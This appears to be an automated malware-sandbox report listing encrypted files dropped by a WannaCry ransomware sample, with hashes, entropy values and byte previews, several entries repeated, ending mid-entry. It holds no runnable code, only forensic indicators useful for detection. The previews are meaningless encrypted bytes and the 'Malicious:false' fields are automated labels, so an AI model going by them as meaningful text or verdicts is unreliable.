                                                                                      Preview:WANACRY!......o..[...$.4$.X.VO....2\..Il..N{.._e....J.>g..z......:X...s....:..zH..-g..,`.-..j`dH..W..s.\.h...N=_.x..Df.\6+........(tH.4.G..".,M.T..'.|........;/..;..~Vfs.......O......A..t%.:..Z..Vi.....v..l8.59...<.=1hf..au.>[=..I.GD..:HZj.........gG..................}....p.d.wd1....-..x.....t.m.....tA..9..`.JNE..K|....9.=x..L..8l...|.OcL.t...!<..S..L...... .K.[E..I7...5...|..;.W/......u.k.*JX...\7.W...RHRm}....R4..\.(..X)c..@........<..E..&...`...FZQ..c...D(.<...DC.7.8....z...........i.2.b......./..d.L...8.U^.../.Z..N../h.yD.........-G...._...{.+`..3...0.`=.I.pp..s..n5.......".:..6.K|wj/._.I.....h...,X....y...3....{...q.....#v....orsAW.....X.L&J...S..... m..,.._...Z'=..n....$5yFe....3(v.......n|.cy.t..z.0.T.n..mk..+..#..@[..4...$..Q.4....#.d..X.~.....#.*.gS?qrB.q.x.%..5....lu:~..G...j.....+Gt.i...J....%-......B+._.#.<.[%.H..|...7t.1-^R.<....}.k..^N?.,....S.)[.K.2:....~q.~..8u.$.l{4^.....p.*p..m....).X...T?-0_Dx.=C..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840869271117256
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkxHELUYFB5A7eAiOLsbm2Uqynx83cZo3ZOD+YpEWcXJX+86VmDIZnxTSdZlhXOO:bkOLHF0ziOYK98sZo3ZOD+Y+zvDIZx+j
                                                                                      MD5:76AE3BD46AC153332644559648E56542
                                                                                      SHA1:35D3D90E24FFEE1712BCC517559541B6B9E21EED
                                                                                      SHA-256:1B3C666589863E3B8210621CB7486C2C0DFFCF85AD275D56E7C86E4E54415655
                                                                                      SHA-512:60B3FE4F5B635812EF5DEDB67B2E14CDDB40A0891651D2F6C9790E9492E14C5B0233504163C3B0CF7B6C7166880A6D3EAEC00223BA128C2010DE2707D4EDD496
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....f.i..l..C%.8...St......}+.F.S~.#...W...=..+...F!"?...I./!~R.Vn.*W..d.a*# ....Y.....eV.F........2.......V...R.f(.9%..>.".....Hw...u.\..........nDd...\u.LcWa.xq....Z...h'.7...Z..qe!../..?:~..x]J.C.&{.A@=...a,V[.}kE.(..TD......8..7...:2..C...J.`.............j...5..K5.VUV.4...M. .t....7:..u.@.2..|T./4....Ov...)...c..j.....?....V'%.).c.J.-....Qu.$w.WV....yX....]u.....+S`Z."...(...jk..Lr...]..I.B.Db..\k.....R.$.:7<.j.J..h.c...`W..Z.Ap!\.%D..Pgx^.....[....O2.'...O<..Q.3.UG._..rH.~..@r.......3^.H...].y..o.>g..+[PUCO...1J...O.Snl7...Nca#..@.j..W.J.....~NQ.K.N......b..#i.~_o.6?......hn.3.$q.a3T.....d..[.~O..N:..=..U..<>T....<=p..F+..}...dop.w.].P.Y.?E.R.}.(V.k..4..%..g+.....a..jd..19..z.....w...<.2w...]Jo.S....>r....g.o.V.T.....`..c..:...p.....j.n,..z...u..$f8.|0;.az%.....G...P.(......q..&..T$__..w..>..!H....F..AMA..4..W...$8.\.y..E..R..<;#bMVW.)..DBI8...bP....m..e.6HS%%.!7`.X..9..M....>;j..1.=.2m5{m......s.QG;....J..C.c_.):..T</._.q.d.4n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840869271117256
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkxHELUYFB5A7eAiOLsbm2Uqynx83cZo3ZOD+YpEWcXJX+86VmDIZnxTSdZlhXOO:bkOLHF0ziOYK98sZo3ZOD+Y+zvDIZx+j
                                                                                      MD5:76AE3BD46AC153332644559648E56542
                                                                                      SHA1:35D3D90E24FFEE1712BCC517559541B6B9E21EED
                                                                                      SHA-256:1B3C666589863E3B8210621CB7486C2C0DFFCF85AD275D56E7C86E4E54415655
                                                                                      SHA-512:60B3FE4F5B635812EF5DEDB67B2E14CDDB40A0891651D2F6C9790E9492E14C5B0233504163C3B0CF7B6C7166880A6D3EAEC00223BA128C2010DE2707D4EDD496
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....f.i..l..C%.8...St......}+.F.S~.#...W...=..+...F!"?...I./!~R.Vn.*W..d.a*# ....Y.....eV.F........2.......V...R.f(.9%..>.".....Hw...u.\..........nDd...\u.LcWa.xq....Z...h'.7...Z..qe!../..?:~..x]J.C.&{.A@=...a,V[.}kE.(..TD......8..7...:2..C...J.`.............j...5..K5.VUV.4...M. .t....7:..u.@.2..|T./4....Ov...)...c..j.....?....V'%.).c.J.-....Qu.$w.WV....yX....]u.....+S`Z."...(...jk..Lr...]..I.B.Db..\k.....R.$.:7<.j.J..h.c...`W..Z.Ap!\.%D..Pgx^.....[....O2.'...O<..Q.3.UG._..rH.~..@r.......3^.H...].y..o.>g..+[PUCO...1J...O.Snl7...Nca#..@.j..W.J.....~NQ.K.N......b..#i.~_o.6?......hn.3.$q.a3T.....d..[.~O..N:..=..U..<>T....<=p..F+..}...dop.w.].P.Y.?E.R.}.(V.k..4..%..g+.....a..jd..19..z.....w...<.2w...]Jo.S....>r....g.o.V.T.....`..c..:...p.....j.n,..z...u..$f8.|0;.az%.....G...P.(......q..&..T$__..w..>..!H....F..AMA..4..W...$8.\.y..E..R..<;#bMVW.)..DBI8...bP....m..e.6HS%%.!7`.X..9..M....>;j..1.=.2m5{m......s.QG;....J..C.c_.):..T</._.q.d.4n
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8756708506984925
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYLhEPO89Q4NH3rXaCGL0g2mN0kC/9lgpAdIWHOZb+GC/SKcqJY14qpUXud:bkyhoaKXrXaj0+N0kC/9lGfbxC/lzQ4u
                                                                                      MD5:463FFB45BD16AE2182FC78660F8174BF
                                                                                      SHA1:966C22D3135ECDBE3BF5438193B6ECF66244E602
                                                                                      SHA-256:0D13E8481DFB1902CCCA47FD8F2869C838FBDE5F9F67AC03520C3C1966765351
                                                                                      SHA-512:98D45DDF4E081E1286E72C31CFBBAC8194D8C096265AD95F2A1E0EEDE59F9C9A0066A0301F762C08FA635B39952819D47F7B9C8BC3C56DC27E791E3AF83E7D1B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....=..,.}...hf.:!...c...OS.^\.b-...6<..Wz.!..{..2.."4..IHd...8{...@.PA..M..g...k..<p.G...{..8..nB..8.q.....q.<*&.."w.t............Y.b..+..G9.H.._...X.....)..MA.v..w.P.C*..o.b.T.?GV...|.jyhy.`.T.j.E.\..F.%.M.t...kLE....y}F."a..~..p.L. :"....F..................H.'..$.~.L..V.....6.ceN..II..b=..p.n...X......?9..r.. ....B:...~~....*ohh....0.H.B...dZ..,IW...Y.K.,......t.'+.%.7.%..[.d.......K...Vwc....NI....[..5.Y.J..Ag.i?.....{U.\.c.>.6..?.^s.F.C}.`P..?.J.7=[v#....8.|...U...O.~8....6.^c..+q.-..Q..r.#...]..x.Y.k....k........$.....7.F.&..../.......x..6..o....i.....1..w.(..uz.O..Pb........1rL...{?...f.d.(.&D.tX........n.....$.S.....E.i.V...qj..T....c...D:...G...............o..'X./...?6..Z.V.qc|..3i....VO.!*.|.u.:......;..).x...~=......|.Q..5.0RI..9E.q....E..Gt..5...]./XQ..!.K.4nD....|.G.C.8!b..O.0."...(s.`:.!....-}E.oZ.-.Y.;m....q..9..."..Z?.....o.+/.Yp...>.5..N.....+8....qb....L[q....9.Ll.>}.R...HnV............[I.h...vA.3}@..._..C..P........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8756708506984925
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYLhEPO89Q4NH3rXaCGL0g2mN0kC/9lgpAdIWHOZb+GC/SKcqJY14qpUXud:bkyhoaKXrXaj0+N0kC/9lGfbxC/lzQ4u
                                                                                      MD5:463FFB45BD16AE2182FC78660F8174BF
                                                                                      SHA1:966C22D3135ECDBE3BF5438193B6ECF66244E602
                                                                                      SHA-256:0D13E8481DFB1902CCCA47FD8F2869C838FBDE5F9F67AC03520C3C1966765351
                                                                                      SHA-512:98D45DDF4E081E1286E72C31CFBBAC8194D8C096265AD95F2A1E0EEDE59F9C9A0066A0301F762C08FA635B39952819D47F7B9C8BC3C56DC27E791E3AF83E7D1B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....=..,.}...hf.:!...c...OS.^\.b-...6<..Wz.!..{..2.."4..IHd...8{...@.PA..M..g...k..<p.G...{..8..nB..8.q.....q.<*&.."w.t............Y.b..+..G9.H.._...X.....)..MA.v..w.P.C*..o.b.T.?GV...|.jyhy.`.T.j.E.\..F.%.M.t...kLE....y}F."a..~..p.L. :"....F..................H.'..$.~.L..V.....6.ceN..II..b=..p.n...X......?9..r.. ....B:...~~....*ohh....0.H.B...dZ..,IW...Y.K.,......t.'+.%.7.%..[.d.......K...Vwc....NI....[..5.Y.J..Ag.i?.....{U.\.c.>.6..?.^s.F.C}.`P..?.J.7=[v#....8.|...U...O.~8....6.^c..+q.-..Q..r.#...]..x.Y.k....k........$.....7.F.&..../.......x..6..o....i.....1..w.(..uz.O..Pb........1rL...{?...f.d.(.&D.tX........n.....$.S.....E.i.V...qj..T....c...D:...G...............o..'X./...?6..Z.V.qc|..3i....VO.!*.|.u.:......;..).x...~=......|.Q..5.0RI..9E.q....E..Gt..5...]./XQ..!.K.4nD....|.G.C.8!b..O.0."...(s.`:.!....-}E.oZ.-.Y.;m....q..9..."..Z?.....o.+/.Yp...>.5..N.....+8....qb....L[q....9.Ll.>}.R...HnV............[I.h...vA.3}@..._..C..P........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.836079837844173
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMIEPVzX50IIZERRxhPdQ5L5+SuJM4bLIv8qmH4ePINLnkvQuXRPHU86T4:bkMIEPvIWRRxhPkL5+TJM9vYH4uzYMRn
                                                                                      MD5:25048A0058F2840EC85AA4585D52123F
                                                                                      SHA1:99D2652D4A9E21746A878D5EE96515EB666AE798
                                                                                      SHA-256:F77ADB6F380F376B87148DED5981A57265A5B1A37E7BB5133AF81100F724FE64
                                                                                      SHA-512:CDA537C64F4D62D43D3805E04FA05818E3C162A6DA0451D8707A47CD8D2F71B95D2C71702DA3DF4CE8797DF890C68733897D620B8435CF1B365366D0554C37CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7'L=.D.ED. .C...lbn.......a.x.{Q:.k.=.e.R.<.=.U...PN.~<.F...r.n.......Fd.l..Da.vsaM=/A..V....../a.....+..)..(. ....N..Z..7.......&@....F.V6.v.Bgz.....\.),...v....q>.0=A.......[.g.....r...2@.V..)._q`.M.ewHU.....mF.D......[.qgU....[..<X..D.o.)m...................-8uhgQ,Z$.b.....sv:W...........W.u...E..G..I...>Q.J.."e.v:|....en...{.7..<.A[.. ..f...*..a'l...*....[x.S.%>..>.m)o0..).-.....o.o.......f.8P.I..bqu..=...Cv.._..>.!..t{.pf..fq{.=...5?.|.O.I^.f...r`.-D.m?.....O..3...&.....u.Z}q.R.'4..^.......o/.......t.=....Zm1ugUP.A.W.U..sM.4....2.....p$../.d.o=..Iu.......v..9}0..7..(.X47QR.&K...?Nk.{*!)'...Ux'\.....A!.%...]2S...`..X..@.w...34...`....Dv.X.[..a...M.m^..X.<@.R.k.3....}.n...S.h.......)........k?A_...Q....5.}8...YT..V.84.~...+%.....'.$.......|..}"...Gp.z..........v..z/w.....W{J..N..Ks..er<.r{.....W..P.Z....K.1..-i..x~..xX0.;Z.@..i.Qe..h....K.^J.H..%..@.8$1.....m...f.....V3..S...@...#.4.a.m..s...xA.;r...kF..M.....D..,....R.F..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.836079837844173
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMIEPVzX50IIZERRxhPdQ5L5+SuJM4bLIv8qmH4ePINLnkvQuXRPHU86T4:bkMIEPvIWRRxhPkL5+TJM9vYH4uzYMRn
                                                                                      MD5:25048A0058F2840EC85AA4585D52123F
                                                                                      SHA1:99D2652D4A9E21746A878D5EE96515EB666AE798
                                                                                      SHA-256:F77ADB6F380F376B87148DED5981A57265A5B1A37E7BB5133AF81100F724FE64
                                                                                      SHA-512:CDA537C64F4D62D43D3805E04FA05818E3C162A6DA0451D8707A47CD8D2F71B95D2C71702DA3DF4CE8797DF890C68733897D620B8435CF1B365366D0554C37CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7'L=.D.ED. .C...lbn.......a.x.{Q:.k.=.e.R.<.=.U...PN.~<.F...r.n.......Fd.l..Da.vsaM=/A..V....../a.....+..)..(. ....N..Z..7.......&@....F.V6.v.Bgz.....\.),...v....q>.0=A.......[.g.....r...2@.V..)._q`.M.ewHU.....mF.D......[.qgU....[..<X..D.o.)m...................-8uhgQ,Z$.b.....sv:W...........W.u...E..G..I...>Q.J.."e.v:|....en...{.7..<.A[.. ..f...*..a'l...*....[x.S.%>..>.m)o0..).-.....o.o.......f.8P.I..bqu..=...Cv.._..>.!..t{.pf..fq{.=...5?.|.O.I^.f...r`.-D.m?.....O..3...&.....u.Z}q.R.'4..^.......o/.......t.=....Zm1ugUP.A.W.U..sM.4....2.....p$../.d.o=..Iu.......v..9}0..7..(.X47QR.&K...?Nk.{*!)'...Ux'\.....A!.%...]2S...`..X..@.w...34...`....Dv.X.[..a...M.m^..X.<@.R.k.3....}.n...S.h.......)........k?A_...Q....5.}8...YT..V.84.~...+%.....'.$.......|..}"...Gp.z..........v..z/w.....W{J..N..Ks..er<.r{.....W..P.Z....K.1..-i..x~..xX0.;Z.@..i.Qe..h....K.^J.H..%..@.8$1.....m...f.....V3..S...@...#.4.a.m..s...xA.;r...kF..M.....D..,....R.F..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865783419038271
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkLtk0WJRefcFkSYYRIhG9bjgX92rXaf7ieGhP9HbCVWDWSpM9i2:bkLtfWJRQc+S3doAef2eGPmVWRp0i2
                                                                                      MD5:963D7E0D10ADF537836F9407171C5C3E
                                                                                      SHA1:10B2E7E4A8B67B1F757E9AA8F6E46384557C8E86
                                                                                      SHA-256:9B28C889932DE6D3C84A1DDCF2C7A88A61932638C27C6A22043387B9A1E4B11A
                                                                                      SHA-512:EDBC0412ED4CC332B2F7AC0D1E52FA4E8BF645BC2D53F8820E7A722031F97D97643F45555779B03D2EFE5D97BED923DA105148A4AA70DBC369F46EC8DCD54621
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....$_...SIX.W.?......N.s$2..... ew..J....5..=.]...@...............{....jE....:.B..?.W.j."......U&.TP.....g@F.s.....}..C....Y3..'.7."%.&..&.@6QX..i..uG.-0...`..X...J .-%*E.0(b=....3......3....+......|...N.]...3Xm......u_...x.....m....y.E.$...Z............w.1..C=.C..=t{hrZ.tx........4.:......H.KCZ.n.*. ..$.3..i~....C...... .n.T,Br.i.p..K.......l.RJc.|g.>...._.].......{/.. .'R.A^.i..v.%....8...N6L.2.c..6\#n.....q...u..$..Z}Pn.....C2.-......R.....'....4..zFH.)4x.B.L.8L..3..\..i.).....2....tN.L........I..jf@.'..wo ..#..I..D.E....6t.^..$D4x3....K....|.j.;c1..............v.[n....-.ZKeJ..c$...x....$.J.a.>.....'.,..)q.:..=..lB.2..UF.w!D....f3G..g.].X..o...;.......!.2G.D+.@.[.Q........{........k.7.1.4....dx.t.j. 7.o..u.........:.u..*.Da^`)p.....6.....o.!.....?P.T...4..J-r..DP...ChIr.Y..<.f.,.u..Y.m.y....E..GY.+f.+.Au..M.A..=..0.z..._n....z@~...."..E.y.@..?6L4..*.4.G.DV.....S.7.4i^...\&........\...@".>..J...x.D..yj7....g..-.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865783419038271
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkLtk0WJRefcFkSYYRIhG9bjgX92rXaf7ieGhP9HbCVWDWSpM9i2:bkLtfWJRQc+S3doAef2eGPmVWRp0i2
                                                                                      MD5:963D7E0D10ADF537836F9407171C5C3E
                                                                                      SHA1:10B2E7E4A8B67B1F757E9AA8F6E46384557C8E86
                                                                                      SHA-256:9B28C889932DE6D3C84A1DDCF2C7A88A61932638C27C6A22043387B9A1E4B11A
                                                                                      SHA-512:EDBC0412ED4CC332B2F7AC0D1E52FA4E8BF645BC2D53F8820E7A722031F97D97643F45555779B03D2EFE5D97BED923DA105148A4AA70DBC369F46EC8DCD54621
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....$_...SIX.W.?......N.s$2..... ew..J....5..=.]...@...............{....jE....:.B..?.W.j."......U&.TP.....g@F.s.....}..C....Y3..'.7."%.&..&.@6QX..i..uG.-0...`..X...J .-%*E.0(b=....3......3....+......|...N.]...3Xm......u_...x.....m....y.E.$...Z............w.1..C=.C..=t{hrZ.tx........4.:......H.KCZ.n.*. ..$.3..i~....C...... .n.T,Br.i.p..K.......l.RJc.|g.>...._.].......{/.. .'R.A^.i..v.%....8...N6L.2.c..6\#n.....q...u..$..Z}Pn.....C2.-......R.....'....4..zFH.)4x.B.L.8L..3..\..i.).....2....tN.L........I..jf@.'..wo ..#..I..D.E....6t.^..$D4x3....K....|.j.;c1..............v.[n....-.ZKeJ..c$...x....$.J.a.>.....'.,..)q.:..=..lB.2..UF.w!D....f3G..g.].X..o...;.......!.2G.D+.@.[.Q........{........k.7.1.4....dx.t.j. 7.o..u.........:.u..*.Da^`)p.....6.....o.!.....?P.T...4..J-r..DP...ChIr.Y..<.f.,.u..Y.m.y....E..GY.+f.+.Au..M.A..=..0.z..._n....z@~...."..E.y.@..?6L4..*.4.G.DV.....S.7.4i^...\&........\...@".>..J...x.D..yj7....g..-.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840459749510188
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYQ/kqZFJ/NYOl6DGsBVqhVLM82I0MjkFTwoH7C2N3loKUwbx+Ib:bkYekqbJ/+Ol6DGhhVDckoW2NOwbx++
                                                                                      MD5:981792151EDDAD15247904B16D2D642B
                                                                                      SHA1:3BF10EE005033F9C5ACB91B4D5FA0BE60DC86840
                                                                                      SHA-256:B0B0AC2645A7E545BC0D2FAEE87EABF6CFAE13041CEE44A9D4D8C3FD68D8E383
                                                                                      SHA-512:0C3A6E12DDBD7487D2851E0A51622BB91810BBEFF82D627BA37DE98A480A9551CE9259A235262F558DBCC89046243888FAB43343E1AD2D4CEBC59DF69CE806DE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....l.=.>K.....<G3_........z......fk.L.&D..,.lo.....]'.p.sPcj7..[.`..V.=...%.g..........47.9.....&...J.....O.>.N.....#t...[.9;.....v.\...m..#....<.a.^W.5.w..\..7..=J..E..2h<R..}..`wH..Q......lx....... ..J#,.x..B\c..Q...0(}.'..{._.vl....e.Z.X.n.jg.............HGt.0.oz.=.y...)...?....*.z.0.Z.g$...~T...X.h.\...][..\O..?.RZ.{.4........lmE.G}...d.I....Y.......m}>1#)....{".7Y...6..U.B..2....W.y....7+$...:...A....l.4.Lu^.N....O....x.t_....u.g$4......=.U.t..3 S.4%..>..n.B.).....'.3.../.w...>......"p...L70.4.P5.-9.."....:.....q..Z..[...$LT.q...k2n?J..c..#%.!&iV....-A.Gczc`z..t..D.`~(DL.s .....|5io..jh...........pP..).sE.|.\..8p...1%...Z..../F.B..+vF.......].a.z1L.s.b.u...|.....C..UZ/..z2.....vGyaS..Pt.. ...k...\J.Fr.X.[.(3,..It.`q..X..}W+.|1.K..CM.}.4..!J_....0.....:.v\..t....;...Z[..~..WAJ..8L/R..!.2.x.o..aw`U....?.Y.[.T.5r.%O.qn...w0d..4w3P.....n...D...:m..W...9......`A..2T....bH2.....W.<..,..C.$..M..9...)..](.....;......Iy..U...pd.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840459749510188
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYQ/kqZFJ/NYOl6DGsBVqhVLM82I0MjkFTwoH7C2N3loKUwbx+Ib:bkYekqbJ/+Ol6DGhhVDckoW2NOwbx++
                                                                                      MD5:981792151EDDAD15247904B16D2D642B
                                                                                      SHA1:3BF10EE005033F9C5ACB91B4D5FA0BE60DC86840
                                                                                      SHA-256:B0B0AC2645A7E545BC0D2FAEE87EABF6CFAE13041CEE44A9D4D8C3FD68D8E383
                                                                                      SHA-512:0C3A6E12DDBD7487D2851E0A51622BB91810BBEFF82D627BA37DE98A480A9551CE9259A235262F558DBCC89046243888FAB43343E1AD2D4CEBC59DF69CE806DE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....l.=.>K.....<G3_........z......fk.L.&D..,.lo.....]'.p.sPcj7..[.`..V.=...%.g..........47.9.....&...J.....O.>.N.....#t...[.9;.....v.\...m..#....<.a.^W.5.w..\..7..=J..E..2h<R..}..`wH..Q......lx....... ..J#,.x..B\c..Q...0(}.'..{._.vl....e.Z.X.n.jg.............HGt.0.oz.=.y...)...?....*.z.0.Z.g$...~T...X.h.\...][..\O..?.RZ.{.4........lmE.G}...d.I....Y.......m}>1#)....{".7Y...6..U.B..2....W.y....7+$...:...A....l.4.Lu^.N....O....x.t_....u.g$4......=.U.t..3 S.4%..>..n.B.).....'.3.../.w...>......"p...L70.4.P5.-9.."....:.....q..Z..[...$LT.q...k2n?J..c..#%.!&iV....-A.Gczc`z..t..D.`~(DL.s .....|5io..jh...........pP..).sE.|.\..8p...1%...Z..../F.B..+vF.......].a.z1L.s.b.u...|.....C..UZ/..z2.....vGyaS..Pt.. ...k...\J.Fr.X.[.(3,..It.`q..X..}W+.|1.K..CM.}.4..!J_....0.....:.v\..t....;...Z[..~..WAJ..8L/R..!.2.x.o..aw`U....?.Y.[.T.5r.%O.qn...w0d..4w3P.....n...D...:m..W...9......`A..2T....bH2.....W.<..,..C.$..M..9...)..](.....;......Iy..U...pd.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846812039748785
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqNGdSyp0IVH3quFqbtuMO+iqejVHoRWCAipRCPSbWtZNtoWNo7IlNkpK3/HQ6h:bkzdiIJktuHpqemWDipRmN1toZ7IpPw8
                                                                                      MD5:B11FC3C06F81C196E7BC62C2BF485BDE
                                                                                      SHA1:E78A5384C2433DF69CE21B52EF3A67356B25807A
                                                                                      SHA-256:D30D35D483332E9F315BBEACF19AB74454EAC50C5BAF41E26DE8E17E39345119
                                                                                      SHA-512:9AC8555734A7139471CAF611BB62FAFB8871C2362ED450F740A6C9C9A0AE7295598C09318F2189CE05174387E9D27DEF300542789AE1D0275D4EFC676F2C27D4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......o....=P(..@..P..V..fi'w.9...eD.h..US.WM_...3l..w..C>qQ.._.....p..A..{.#......:....9.....'.~c...Z.^......x.....gX..7Z...S.{.3.>^......H.N\..(W.u%.+.o,...,.......#x..V]X...:.V.....'\..N.y.qy{T~pv..P.7.?Y..D|H]........N...y.((....*-\.j...............\........r..k.S.j.6..Y...*.6!(......."=@..\uX.p.'G.....fz..D..9..P.S....s.-.=M..l.......:.?.[R)~.JM.j.(.K.B..Q.).......m....._...."?.kH.-..a...x..K1*)....H....w..2.... \.d`.X..R<...1......V.....a3|s..9,~....u...d...~R...<.|'....2.[....'....1.q/....r.X]...O.F....k....Q2X..k.vx.O:b.]..:i.6..EwY...R....a.E.0...<_.ov8.O....n.6eK.J.../..1.j`..Rn.A|'.P)..R....+...!....r../.S.0.Z...B.-.$....i...H...;qh...._.'..k..!'a........x....._Y..JT..\.V.09k....nL|g.\.......=.6.%."C.~F.....zd"....R.w.0.......S..'..O'G..d...v...VJoo. GB..z..c...=.Z.....~.$.....qR...}8H.......q.}d.3[...t.cWC.P.D...&..S...<q.b....cQ.....[.Y..s..jB....)s.qu4...._..F.x.7m...e..6Y...:.F.y.....m..-....]1..d..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846812039748785
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqNGdSyp0IVH3quFqbtuMO+iqejVHoRWCAipRCPSbWtZNtoWNo7IlNkpK3/HQ6h:bkzdiIJktuHpqemWDipRmN1toZ7IpPw8
                                                                                      MD5:B11FC3C06F81C196E7BC62C2BF485BDE
                                                                                      SHA1:E78A5384C2433DF69CE21B52EF3A67356B25807A
                                                                                      SHA-256:D30D35D483332E9F315BBEACF19AB74454EAC50C5BAF41E26DE8E17E39345119
                                                                                      SHA-512:9AC8555734A7139471CAF611BB62FAFB8871C2362ED450F740A6C9C9A0AE7295598C09318F2189CE05174387E9D27DEF300542789AE1D0275D4EFC676F2C27D4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......o....=P(..@..P..V..fi'w.9...eD.h..US.WM_...3l..w..C>qQ.._.....p..A..{.#......:....9.....'.~c...Z.^......x.....gX..7Z...S.{.3.>^......H.N\..(W.u%.+.o,...,.......#x..V]X...:.V.....'\..N.y.qy{T~pv..P.7.?Y..D|H]........N...y.((....*-\.j...............\........r..k.S.j.6..Y...*.6!(......."=@..\uX.p.'G.....fz..D..9..P.S....s.-.=M..l.......:.?.[R)~.JM.j.(.K.B..Q.).......m....._...."?.kH.-..a...x..K1*)....H....w..2.... \.d`.X..R<...1......V.....a3|s..9,~....u...d...~R...<.|'....2.[....'....1.q/....r.X]...O.F....k....Q2X..k.vx.O:b.]..:i.6..EwY...R....a.E.0...<_.ov8.O....n.6eK.J.../..1.j`..Rn.A|'.P)..R....+...!....r../.S.0.Z...B.-.$....i...H...;qh...._.'..k..!'a........x....._Y..JT..\.V.09k....nL|g.\.......=.6.%."C.~F.....zd"....R.w.0.......S..'..O'G..d...v...VJoo. GB..z..c...=.Z.....~.$.....qR...}8H.......q.}d.3[...t.cWC.P.D...&..S...<q.b....cQ.....[.Y..s..jB....)s.qu4...._..F.x.7m...e..6Y...:.F.y.....m..-....]1..d..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.855999877433789
                                                                                      Encrypted:false
